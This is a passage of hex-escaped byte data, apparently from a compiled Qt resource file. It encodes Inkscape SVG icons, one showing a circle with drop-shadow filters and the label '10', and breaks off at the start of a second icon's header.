\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x63\x6f\
\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x73\x74\x64\x44\x65\x76\x69\x61\x74\x69\x6f\x6e\x3d\
\x22\x30\x2e\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\
\x65\x73\x75\x6c\x74\x3d\x22\x62\x6c\x75\x72\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x47\x61\x75\x73\
\x73\x69\x61\x6e\x42\x6c\x75\x72\x39\x30\x38\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x4f\x66\x66\x73\x65\x74\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x78\x3d\x22\x30\x2e\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x79\x3d\x22\x30\
\x2e\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\
\x75\x6c\x74\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x4f\x66\x66\x73\
\x65\x74\x39\x31\x30\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x53\x6f\x75\x72\x63\x65\
\x47\x72\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x69\x6e\x32\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x70\x65\x72\x61\x74\x6f\x72\
\x3d\x22\x6f\x76\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\x6d\x70\x6f\x73\x69\
\x74\x65\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x39\x31\x32\
\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x66\x69\x6c\x74\x65\
\x72\x3e\x0a\x20\x20\x20\x20\x3c\x66\x69\x6c\x74\x65\x72\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x63\x6f\x6c\
\x6f\x72\x2d\x69\x6e\x74\x65\x72\x70\x6f\x6c\x61\x74\x69\x6f\x6e\
\x2d\x66\x69\x6c\x74\x65\x72\x73\x3a\x73\x52\x47\x42\x3b\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x6c\x61\x62\x65\x6c\x3d\x22\x44\x72\x6f\x70\x20\x53\x68\x61\x64\
\x6f\x77\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\
\x69\x6c\x74\x65\x72\x39\x33\x38\x22\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x3c\x66\x65\x46\x6c\x6f\x6f\x64\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3d\x22\x30\x2e\x34\x39\x38\x30\x33\x39\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x63\x6f\x6c\x6f\x72\
\x3d\x22\x72\x67\x62\x28\x30\x2c\x30\x2c\x30\x29\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x66\
\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x66\x65\x46\x6c\x6f\x6f\x64\x39\x32\x38\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x43\x6f\x6d\x70\x6f\
\x73\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\
\x3d\x22\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x69\x6e\x32\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\x72\x61\
\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\
\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x69\x6e\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\
\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\
\x74\x65\x39\x33\x30\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x66\x65\x47\x61\x75\x73\x73\x69\x61\x6e\x42\x6c\x75\x72\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x63\x6f\x6d\
\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x64\x44\x65\x76\x69\x61\x74\x69\x6f\x6e\x3d\x22\
\x30\x2e\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\
\x73\x75\x6c\x74\x3d\x22\x62\x6c\x75\x72\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x47\x61\x75\x73\x73\
\x69\x61\x6e\x42\x6c\x75\x72\x39\x33\x32\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x66\x65\x4f\x66\x66\x73\x65\x74\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x64\x78\x3d\x22\x30\x2e\x31\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x79\x3d\x22\x30\x2e\
\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\
\x6c\x74\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x4f\x66\x66\x73\x65\
\x74\x39\x33\x34\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\
\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\
\x72\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x6e\x32\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x6f\x70\x65\x72\x61\x74\x6f\x72\x3d\
\x22\x6f\x76\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\x6d\x70\x6f\x73\x69\x74\
\x65\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x39\x33\x36\x22\
\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x66\x69\x6c\x74\x65\x72\
\x3e\x0a\x20\x20\x3c\x2f\x64\x65\x66\x73\x3e\x0a\x20\x20\x3c\x6d\
\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\x30\x33\x39\x22\x3e\x0a\
\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\
\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\
\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\
\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\
\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\
\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\
\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\
\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6c\x61\x79\x65\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\
\x62\x65\x6e\x65\x20\x32\x22\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\
\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x38\x38\x39\x37\x36\x33\x37\
\x38\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\
\x3a\x62\x75\x74\x74\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\
\x65\x6a\x6f\x69\x6e\x3a\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x66\x69\x6c\x74\x65\x72\x3a\x75\x72\
\x6c\x28\x23\x66\x69\x6c\x74\x65\x72\x39\x33\x38\x29\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x6d\x20\x31\x31\x2e\x33\x30\
\x33\x30\x38\x35\x2c\x31\x31\x2e\x31\x35\x34\x37\x35\x36\x20\x33\
\x2e\x38\x33\x38\x38\x33\x2c\x33\x2e\x39\x31\x30\x34\x38\x38\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x35\x36\x31\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\
\x63\x75\x72\x76\x61\x74\x75\x72\x65\x3d\x22\x30\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\
\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\
\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\
\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x61\x66\x63\
\x36\x65\x39\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x30\x2e\x37\x38\x34\x31\x37\x32\x36\x33\x3b\x73\x74\x72\x6f\
\x6b\x65\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x31\x39\x30\x39\x33\x39\
\x34\x33\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\
\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\
\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x66\x69\
\x6c\x74\x65\x72\x3a\x75\x72\x6c\x28\x23\x66\x69\x6c\x74\x65\x72\
\x39\x31\x34\x29\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x61\x74\x68\x35\x36\x30\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x63\x78\x3d\x22\x36\x2e\x38\x34\x37\x35\x30\x33\x37\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x36\x2e\x38\x36\
\x30\x30\x30\x32\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\
\x22\x36\x2e\x30\x34\x31\x32\x34\x33\x31\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\
\x61\x2d\x6c\x61\x62\x65\x6c\x3d\x22\x31\x30\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\
\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\
\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\
\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x31\
\x30\x2e\x36\x36\x36\x36\x36\x36\x39\x38\x70\x78\x3b\x6c\x69\x6e\
\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\
\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\
\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\
\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\
\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x20\x48\x65\x61\x76\x79\x27\
\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\
\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\x70\x61\x63\x69\x6e\x67\
\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\x35\x39\
\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\
\x6f\x72\x6d\x3d\x22\x6d\x61\x74\x72\x69\x78\x28\x30\x2e\x37\x36\
\x34\x33\x30\x36\x37\x2c\x30\x2c\x30\x2c\x30\x2e\x38\x35\x31\x36\
\x32\x38\x39\x36\x2c\x30\x2e\x36\x35\x34\x32\x32\x37\x38\x37\x2c\
\x30\x2e\x30\x32\x30\x33\x35\x35\x33\x32\x29\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x64\x3d\x22\x4d\x20\x32\x2e\x34\x39\x38\x31\x36\x36\
\x37\x2c\x31\x31\x2e\x31\x38\x37\x35\x20\x48\x20\x37\x2e\x34\x34\
\x37\x35\x30\x30\x32\x20\x56\x20\x39\x2e\x37\x31\x35\x35\x20\x48\
\x20\x35\x2e\x39\x39\x36\x38\x33\x33\x35\x20\x56\x20\x34\x2e\x34\
\x32\x34\x38\x33\x33\x31\x20\x48\x20\x34\x2e\x36\x35\x32\x38\x33\
\x33\x34\x20\x63\x20\x2d\x30\x2e\x35\x33\x33\x33\x33\x33\x33\x2c\
\x30\x2e\x33\x32\x20\x2d\x31\x2e\x30\x36\x36\x36\x36\x36\x37\x2c\
\x30\x2e\x35\x31\x32\x20\x2d\x31\x2e\x38\x37\x37\x33\x33\x33\x34\
\x2c\x30\x2e\x36\x36\x31\x33\x33\x33\x34\x20\x56\x20\x36\x2e\x32\
\x31\x36\x38\x33\x33\x32\x20\x48\x20\x34\x2e\x31\x36\x32\x31\x36\
\x36\x37\x20\x56\x20\x39\x2e\x37\x31\x35\x35\x20\x68\x20\x2d\x31\
\x2e\x36\x36\x34\x20\x7a\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x37\x31\x31\x37\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\
\x74\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\
\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\
\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\
\x22\x6d\x20\x31\x31\x2e\x32\x38\x33\x33\x33\x34\x2c\x31\x31\x2e\
\x33\x31\x35\x35\x20\x63\x20\x31\x2e\x35\x38\x39\x33\x33\x33\x2c\
\x30\x20\x32\x2e\x36\x36\x36\x36\x36\x36\x2c\x2d\x31\x2e\x32\x32\
\x36\x36\x36\x37\x20\x32\x2e\x36\x36\x36\x36\x36\x36\x2c\x2d\x33\
\x2e\x35\x34\x31\x33\x33\x33\x34\x20\x30\x2c\x2d\x32\x2e\x33\x31\
\x34\x36\x36\x36\x38\x20\x2d\x31\x2e\x30\x37\x37\x33\x33\x33\x2c\
\x2d\x33\x2e\x34\x37\x37\x33\x33\x33\x35\x20\x2d\x32\x2e\x36\x36\
\x36\x36\x36\x36\x2c\x2d\x33\x2e\x34\x37\x37\x33\x33\x33\x35\x20\
\x2d\x31\x2e\x35\x38\x39\x33\x33\x33\x38\x2c\x30\x20\x2d\x32\x2e\
\x36\x36\x36\x36\x36\x37\x32\x2c\x31\x2e\x31\x36\x32\x36\x36\x36\
\x37\x20\x2d\x32\x2e\x36\x36\x36\x36\x36\x37\x32\x2c\x33\x2e\x34\
\x37\x37\x33\x33\x33\x35\x20\x30\x2c\x32\x2e\x33\x31\x34\x36\x36\
\x36\x34\x20\x31\x2e\x30\x37\x37\x33\x33\x33\x34\x2c\x33\x2e\x35\
\x34\x31\x33\x33\x33\x34\x20\x32\x2e\x36\x36\x36\x36\x36\x37\x32\
\x2c\x33\x2e\x35\x34\x31\x33\x33\x33\x34\x20\x7a\x20\x6d\x20\x30\
\x2c\x2d\x31\x2e\x34\x30\x38\x20\x43\x20\x31\x30\x2e\x37\x31\x38\
\x2c\x39\x2e\x39\x30\x37\x35\x20\x31\x30\x2e\x32\x33\x38\x2c\x39\
\x2e\x34\x35\x39\x34\x39\x39\x39\x20\x31\x30\x2e\x32\x33\x38\x2c\
\x37\x2e\x37\x37\x34\x31\x36\x36\x36\x20\x63\x20\x30\x2c\x2d\x31\
\x2e\x36\x38\x35\x33\x33\x33\x34\x20\x30\x2e\x34\x38\x2c\x2d\x32\
\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x31\x2e\x30\x34\x35\x33\x33\
\x34\x2c\x2d\x32\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x30\x2e\x35\
\x36\x35\x33\x33\x33\x2c\x30\x20\x31\x2e\x30\x34\x35\x33\x33\x33\
\x2c\x30\x2e\x33\x38\x34\x20\x31\x2e\x30\x34\x35\x33\x33\x33\x2c\
\x32\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x30\x2c\x31\x2e\x36\x38\
\x35\x33\x33\x33\x33\x20\x2d\x30\x2e\x34\x38\x2c\x32\x2e\x31\x33\
\x33\x33\x33\x33\x34\x20\x2d\x31\x2e\x30\x34\x35\x33\x33\x33\x2c\
\x32\x2e\x31\x33\x33\x33\x33\x33\x34\x20\x7a\x20\x6d\x20\x30\x2c\
\x2d\x31\x2e\x32\x38\x30\x30\x30\x30\x31\x20\x63\x20\x30\x2e\x34\
\x39\x30\x36\x36\x36\x2c\x30\x20\x30\x2e\x38\x35\x33\x33\x33\x33\
\x2c\x2d\x30\x2e\x33\x34\x31\x33\x33\x33\x33\x20\x30\x2e\x38\x35\
\x33\x33\x33\x33\x2c\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\x33\x20\
\x30\x2c\x2d\x30\x2e\x35\x31\x32\x30\x30\x30\x31\x20\x2d\x30\x2e\
\x33\x36\x32\x36\x36\x37\x2c\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\
\x34\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\x2c\x2d\x30\x2e\x38\
\x35\x33\x33\x33\x33\x34\x20\x2d\x30\x2e\x34\x39\x30\x36\x36\x37\
\x2c\x30\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x34\x2c\x30\x2e\x33\
\x34\x31\x33\x33\x33\x33\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x34\
\x2c\x30\x2e\x38\x35\x33\x33\x33\x33\x34\x20\x30\x2c\x30\x2e\x35\
\x31\x32\x20\x30\x2e\x33\x36\x32\x36\x36\x37\x2c\x30\x2e\x38\x35\
\x33\x33\x33\x33\x33\x20\x30\x2e\x38\x35\x33\x33\x33\x34\x2c\x30\
\x2e\x38\x35\x33\x33\x33\x33\x33\x20\x7a\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x37\x31\x31\
\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\
\x75\x72\x76\x61\x74\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\
\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\
\x76\x67\x3e\x0a\
\x00\x00\x09\x12\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x6d\x6d\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x38\
\x6d\x6d\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\
\x30\x20\x30\x20\x31\x36\x20\x38\x22\x0a\x20\x20\x20\x76\x65\x72\
\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\
\x3d\x22\x73\x76\x67\x38\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\
\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x70\x6c\x69\
